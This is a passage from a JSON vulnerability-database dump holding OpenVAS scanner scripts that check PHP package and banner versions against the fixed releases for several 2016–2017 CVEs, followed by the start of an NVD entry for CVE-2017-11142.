Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.5.9+dfsg-1ubuntu4.22\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.22-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php7.0\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cgi\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-cli\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php7.0-fpm\", ver:\"7.0.22-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11146", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2017-07-11T00:00:00", "id": "OPENVAS:1361412562310811481", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811481", "type": "openvas", "title": "PHP Multiple Vulnerabilities - Jul17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_multiple_vuln_jul_win.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# PHP Multiple Vulnerabilities - Jul17 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811481\");\n script_version(\"$Revision: 11863 $\");\n script_cve_id(\"CVE-2017-11145\", \"CVE-2017-11144\", \"CVE-2017-11146\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_bugtraq_id(99492, 99550, 99605, 99612, 99489);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-11 19:28:21 +0530 (Tue, 11 Jul 2017)\");\n script_name(\"PHP Multiple Vulnerabilities - Jul17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An ext/date/lib/parse_date.c out-of-bounds read affecting the php_parse_date\n function.\n\n - The openssl extension PEM sealing code did not check the return value of the\n OpenSSL sealing function.\n\n - lack of bounds checks in the date extension's timelib_meridian parsing code.\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in\n 'Zend/zend_ini_parser.c' script.\n\n - The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD\n Graphics Library (aka libgd) does not zero colorMap arrays before use.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to leak information from the interpreter, crash PHP\n interpreter and also disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.21,\n and 7.1.x before 7.1.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.21, 7.1.7,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:port)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nif(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.20\")){\n fix = \"7.0.21\";\n}\n\nif(vers =~ \"^7\\.1\" && version_is_less(version:vers, test_version:\"7.1.7\")){\n fix = \"7.1.7\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11146", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "description": "This host is installed with PHP and is prone\n to multiple vulnerabilities.", "modified": "2018-10-15T00:00:00", "published": "2017-07-11T00:00:00", "id": "OPENVAS:1361412562310811482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811482", "type": "openvas", "title": "PHP Multiple Vulnerabilities - Jul17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_multiple_vuln_jul_lin.nasl 11900 2018-10-15 07:44:31Z mmartin $\n#\n# PHP Multiple Vulnerabilities - Jul17 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811482\");\n script_version(\"$Revision: 11900 $\");\n script_cve_id(\"CVE-2017-11145\", \"CVE-2017-11144\", \"CVE-2017-11146\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_bugtraq_id(99492, 99550, 99605, 99612, 99489);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-15 09:44:31 +0200 (Mon, 15 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-11 19:29:21 +0530 (Tue, 11 Jul 2017)\");\n script_name(\"PHP Multiple Vulnerabilities - Jul17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - An ext/date/lib/parse_date.c out-of-bounds read affecting the php_parse_date\n function.\n\n - The openssl extension PEM sealing code did not check the return value of the\n OpenSSL sealing function.\n\n - lack of bounds checks in the date extension's timelib_meridian parsing code.\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in\n 'Zend/zend_ini_parser.c' script.\n\n - The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD\n Graphics Library (aka libgd) does not zero colorMap arrays before use.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote attackers to leak information from the interpreter, crash PHP\n interpreter and also disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.21,\n and 7.1.x before 7.1.7\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.21, 7.1.7,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nif(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.20\")){\n fix = \"7.0.21\";\n}\n\nif(vers =~ \"^7\\.1\" && version_is_less(version:vers, test_version:\"7.1.7\")){\n fix = \"7.1.7\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11142"], "description": "This host is installed with PHP and is prone\n to denial of service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-07-13T00:00:00", "id": "OPENVAS:1361412562310811487", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811487", "type": "openvas", "title": "PHP Denial of Service Vulnerability Jul17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dos_vuln_jul17_lin.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# PHP Denial of Service Vulnerability Jul17 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811487\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2017-11142\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-13 17:48:21 +0530 (Thu, 13 Jul 2017)\");\n script_name(\"PHP Denial of Service Vulnerability Jul17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to improper handling of long\n form variables in main/php_variables.c script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n an attacker to cause a CPU consumption denial of service attack.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.17,\n and 7.1.x before 7.1.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.17,\n 7.1.3 or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.16\")){\n fix = \"7.0.17\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.1\", test_version2:\"7.1.2\")){\n fix = \"7.1.3\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11142"], "description": "This host is installed with PHP and is prone\n to denial of service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-07-13T00:00:00", "id": "OPENVAS:1361412562310811486", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811486", "type": "openvas", "title": "PHP Denial of Service Vulnerability Jul17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_dos_vuln_jul17_win.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# PHP Denial of Service Vulnerability Jul17 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811486\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2017-11142\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-13 17:38:21 +0530 (Thu, 13 Jul 2017)\");\n script_name(\"PHP Denial of Service Vulnerability Jul17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to improper handling of long\n form variables in main/php_variables.c script.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n an attacker to cause a CPU consumption denial of service attack.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.31, 7.x before 7.0.17,\n and 7.1.x before 7.1.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.31, 7.0.17,\n 7.1.3 or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.31\")){\n fix = \"5.6.31\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.16\")){\n fix = \"7.0.17\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.1\", test_version2:\"7.1.2\")){\n fix = \"7.1.3\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397"], "description": "This host is installed with PHP and is prone\n to security bypass vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-07-13T00:00:00", "id": "OPENVAS:1361412562310811489", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811489", "type": "openvas", "title": "PHP 'URL checks' Security Bypass Vulnerability Jul17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_security_bypass_vuln_lin.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# PHP 'URL checks' Security Bypass Vulnerability Jul17 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811489\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2016-10397\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-13 16:38:21 +0530 (Thu, 13 Jul 2017)\");\n script_name(\"PHP 'URL checks' Security Bypass Vulnerability Jul17 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to incorrect handling of\n various URI components in the URL parser.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n an attacker to bypass hostname-specific URL checks.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.28, 7.x before 7.0.13\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.28, 7.0.13,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.28\")){\n fix = \"5.6.28\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.12\")){\n fix = \"7.0.13\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397"], "description": "This host is installed with PHP and is prone\n to security bypass vulnerability.", "modified": "2018-10-18T00:00:00", "published": "2017-07-13T00:00:00", "id": "OPENVAS:1361412562310811488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811488", "type": "openvas", "title": "PHP 'URL checks' Security Bypass Vulnerability Jul17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_security_bypass_vuln_win.nasl 11959 2018-10-18 10:33:40Z mmartin $\n#\n# PHP 'URL checks' Security Bypass Vulnerability Jul17 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811488\");\n script_version(\"$Revision: 11959 $\");\n script_cve_id(\"CVE-2016-10397\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:33:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-13 16:38:21 +0530 (Thu, 13 Jul 2017)\");\n script_name(\"PHP 'URL checks' Security Bypass Vulnerability Jul17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to incorrect handling of\n various URI components in the URL parser.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n an attacker to bypass hostname-specific URL checks.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.6.28, 7.x before 7.0.13\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.6.28, 7.0.13,\n or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-7.php\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(phpport = get_app_port(cpe:CPE))){\n exit(0);\n}\n\nif(! vers = get_app_version(cpe:CPE, port:phpport)){\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"5.6.28\")){\n fix = \"5.6.28\";\n}\n\nelse if(version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.12\")){\n fix = \"7.0.13\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:fix);\n security_message(port:phpport, data:report);\n exit(0);\n}\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2021-02-02T06:36:32", "description": "In PHP before 5.6.31, 7.x before 7.0.17, and 7.1.x before 7.1.3, remote attackers could cause a CPU consumption denial of service attack by injecting long form variables, related to main/php_variables.c.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "title": "CVE-2017-11142", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 